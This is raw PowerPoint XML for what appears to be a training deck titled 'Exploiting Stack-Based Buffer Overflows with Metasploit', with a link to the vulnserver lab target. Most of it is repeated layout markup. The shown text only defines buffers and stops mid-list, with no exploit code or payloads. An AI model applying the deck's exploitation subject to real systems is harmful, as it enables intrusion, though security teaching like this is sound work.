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DF74-F3AB-99F6-629F-1188F273DB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A8D825-A7A9-EB81-84E1-5DB9D5A591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1F064E-BF85-5DA7-31B8-A932DB212E96}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{26D76ACC-9DA2-4D1F-8D94-D46DAA9B1AF1}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>01-03-2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{035CFADD-5EA6-0C55-3B65-E8EC9E5390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4D00C-70CC-7544-9A37-1BE246D3539F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2B12530F-4F56-4FD8-9BE2-20308BA82AE3}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="980336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D002-0257-62E5-1909-19CDB2B12A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02EEF9-F7DA-C843-90E9-036E808569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352D4B-2531-F265-F0B3-91E71B5B5AC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{26D76ACC-9DA2-4D1F-8D94-D46DAA9B1AF1}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>01-03-2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE5ECB5C-4EC9-61E9-50DB-6CF9B6C6D9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81D08E-D605-7ED2-3E49-2E108C93663C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2B12530F-4F56-4FD8-9BE2-20308BA82AE3}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="187893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796929-4FE4-CF60-2F9F-C40B3C8968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19FDBE-39E4-3801-FDC5-8E2129A854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0F11CF-A3D7-AFD5-0EB6-7F02E46E2649}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{26D76ACC-9DA2-4D1F-8D94-D46DAA9B1AF1}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>01-03-2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D0DE6FE-CA0E-9131-B9B8-830974637F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8E900F-CC6B-8597-E9CC-132DC92C0CDA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2B12530F-4F56-4FD8-9BE2-20308BA82AE3}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1755312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728DD-8F28-7F15-E7CD-A2AC699637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8054F3-445C-66E1-8837-E761F30A9B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190EB5-7E0C-936C-ACD7-BBF4FA818FBC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{26D76ACC-9DA2-4D1F-8D94-D46DAA9B1AF1}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>01-03-2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40CC2B80-584F-C337-7C50-5FD0479294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E9C739-8E09-EE79-C98A-9E38A2ACC183}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2B12530F-4F56-4FD8-9BE2-20308BA82AE3}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="944921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3BE1-D41C-8EB3-8D90-202A6F0A15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532647-3218-0649-A72E-6BB2F80A17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CCB470-AEF9-BEFD-9835-D6DF2C1E8949}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{26D76ACC-9DA2-4D1F-8D94-D46DAA9B1AF1}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>01-03-2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2416D60-EE23-1257-A662-30E96874B2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770047-7E35-9C3E-3ACF-6D9F0B0C333C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2B12530F-4F56-4FD8-9BE2-20308BA82AE3}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1485806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986C9-0089-28FE-6BA0-9E69CDF8FF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85C18F-28A8-37B1-50A0-8FAEE27A76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65CF0B-3AEF-4B17-C443-9AC3A6F099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3A0E00-010E-CB5B-BA8B-A12935C6A4CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{26D76ACC-9DA2-4D1F-8D94-D46DAA9B1AF1}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>01-03-2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59F84A79-40A4-49FE-6FC9-DFA9824166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CD6436-65CC-0B69-3034-AD8423A8E112}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2B12530F-4F56-4FD8-9BE2-20308BA82AE3}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38301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9537-221D-CC32-9CFE-0784642534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55DA1E-9F08-5E8C-4A8B-87CDBCC92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176BC0-5F70-E3DA-9DB9-0EEEEC09F8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3E3B22-6C4D-023B-FF86-7F0EC5C5A9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2B91AE-492F-92D2-7D23-BE7E139CB2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1F5032-BB68-0623-1DF9-E79F1AC22CCE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{26D76ACC-9DA2-4D1F-8D94-D46DAA9B1AF1}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>01-03-2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Footer Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BFC53BF-AB8C-FA52-65F4-EECD8819B9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9DCD18-8D0F-5B1D-82CD-A75AE89B20E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2B12530F-4F56-4FD8-9BE2-20308BA82AE3}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1057462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2538D-B192-8BA5-AB84-540C7B38B1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E7D17B-4053-389D-851A-EA25BABE4BF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{26D76ACC-9DA2-4D1F-8D94-D46DAA9B1AF1}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>01-03-2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47574103-BD14-BE1A-1AF0-39308EE3CC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A79544-A8FB-8736-7B42-9E720F4E9AF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2B12530F-4F56-4FD8-9BE2-20308BA82AE3}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1996268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364AD2-DCF4-CCB2-3AF6-A7722872F7D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{26D76ACC-9DA2-4D1F-8D94-D46DAA9B1AF1}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>01-03-2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C40AC237-E7B1-07CA-DE27-B1696D7A6F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5DE894-0B81-45BF-BCE9-9CC63C75C237}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2B12530F-4F56-4FD8-9BE2-20308BA82AE3}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2855154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2244-A76D-4BA9-389E-F618DFE46F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8B96C9-AE7A-C7D7-4AA5-90AC2ED8E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7780AD-03F0-26BA-A428-0EC8345E6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BE72D-79EE-5DD8-4D0B-3254F31756AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{26D76ACC-9DA2-4D1F-8D94-D46DAA9B1AF1}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>01-03-2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21668A1D-339D-5C95-CCE4-5595FC2F81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99A1BD-D758-946D-98F7-8810111965C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2B12530F-4F56-4FD8-9BE2-20308BA82AE3}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1577897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2B2B2-B399-7B7D-2A2E-5F65393A16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65E23C-9C5C-E024-B6B3-377ECB807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6BE4B5F-1F54-33B8-D9F6-F8B865CE7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9FE599-4F7B-D578-4E07-C76CB601FEB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{26D76ACC-9DA2-4D1F-8D94-D46DAA9B1AF1}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>01-03-2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E3F3CBA-7B08-4002-36A6-882EAA438E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7C0A63-2639-144D-32DD-E9CEE010A6CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2B12530F-4F56-4FD8-9BE2-20308BA82AE3}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27943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3B7E04-CE8B-F1A4-89FC-FC37E3187B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A97F09-86A2-2B4B-2598-2BCB61D647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EE5E1F-124C-D184-8FFB-DEB4469189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76ACC-9DA2-4D1F-8D94-D46DAA9B1AF1}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>01-03-2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16B64C96-F761-5C22-2841-DD9D6E219C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3B28B9-8319-2F31-FBA3-6A14A84D0E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2530F-4F56-4FD8-9BE2-20308BA82AE3}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3246308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thegreycorner.com/2010/12/introducing-vulnserver.html" TargetMode="Externa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91B62-6FA3-C83D-5D07-AD7D68AE70BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1"/>
            <a:ext cx="12192000" cy="457199"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" u="sng" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Exploiting Stack-Based Buffer Overflows with Metasploit </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2800"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CFFB817-80D1-06FC-0A09-BFDD8A495B2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="457200"/>
            <a:ext cx="12192000" cy="4800600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="0" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>What is Buffer Overflow?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Buffer overflow is simply overflowing the buffer space that a program or application has been allocated in the memory.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Temporary Storage: In programming, buffers are like temporary holding areas for data. Think of them as containers with a fixed size.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Common Purposes: Buffers are frequently used when:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Transferring data between different parts of a program.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Reading user input.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
